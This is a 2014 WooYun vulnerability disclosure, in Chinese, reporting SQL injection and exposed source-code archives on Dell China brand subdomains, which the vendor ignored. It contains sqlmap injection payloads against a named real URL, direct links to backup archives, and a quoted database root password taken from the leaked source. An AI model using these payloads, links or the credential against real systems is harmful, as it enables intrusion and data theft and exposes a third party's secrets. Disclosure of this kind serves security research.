当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066011

漏洞标题:戴尔中国SQL注入+源码下载

相关厂商:戴尔中国

漏洞作者: 路人甲

提交时间:2014-06-24 16:41

修复时间:2014-06-29 16:42

公开时间:2014-06-29 16:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-24: 细节已通知厂商并且等待厂商处理中
2014-06-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

忽不忽略都我来说 无所谓 我已经做了我该做的了。

详细说明:

sql 0x01:http://advisor.dell-brand.com/index.php?a=index&m=solution&id=45

Place: GET
Parameter: id
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: a=index&m=solution&id=45 RLIKE IF(3403=3403,45,0x28)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: a=index&m=solution&id=45 AND (SELECT 5930 FROM(SELECT COUNT(*),CONCAT(0x7170767371,(SELECT (CASE WHEN (5930=5930) THEN 1 ELSE 0 END)),0x71696c7271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: a=index&m=solution&id=45 AND SLEEP(5)
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.19
back-end DBMS: MySQL 5.0
available databases [3]:
[*] advisor
[*] information_schema
[*] test


code down 0x01:

http://advisor.dell-brand.com/bbs.rar


xx.png


code down 0x02:

http://dellcity.dell-brand.com/dellcity.tar.gz


xx2.png

漏洞证明:

C:\Users\...\Desktop\dell2\user_statistics.php

$db= mysql_connect('localhost', 'root', '99gaming!@#');


xxx.png


在本地搭个PHP环境 然后把源码放进去那个叫什么?? 什么审计??

修复方案:

你们这么屌。。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-29 16:42

厂商回复:

最新状态:

暂无